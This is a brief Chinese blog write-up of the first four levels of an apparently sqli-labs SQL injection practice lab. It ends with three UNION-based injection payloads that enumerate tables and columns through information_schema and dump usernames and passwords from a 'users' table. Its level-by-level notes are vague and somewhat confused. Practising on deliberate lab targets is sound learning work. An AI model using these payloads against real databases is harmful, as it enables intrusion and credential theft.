sql联合查询(初体验)

本文详细解析了SQL注入攻击的四种常见类型,并通过实例演示如何利用这些漏洞进行数据库爆破,包括数据表、字段及数据库内容的拖取。适合对信息安全有兴趣的学习者和技术人员。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一,sql查询注入类型(今天先前四关)

1.第一关

(1)先用数值型测试是否有漏洞

(2)发现数组都能进去所以不是 数组 然后咱们用字符串测试(漏洞进去成功)

2.第二关

(1)首先数值测试

(2)再用错误的尝试 (结论还是数组的漏洞)

3.第三题

(1)首先用数值(无论怎样输入只要数组就能进去所以数组不是漏洞)

(2)在用字符串测试(字符串报错显示它不支持字符串)

(3)那最后就用错误尝试(漏洞在错误查询)

4.第四题

(1)还是数值型查询(数组尝试都能进去,所以漏洞不在数组)

(2)字符串尝试(字符串这里也都能进去也不报错,所以漏洞也不再这)

(3)最终错误查询(漏洞可以在单引号前加双引号)

二,三部爆破数据库

1.爆数据表(/?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3 )

2.爆字段(id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users'  ),3

3.拖数据库(/?id=-1 union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3

三,

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值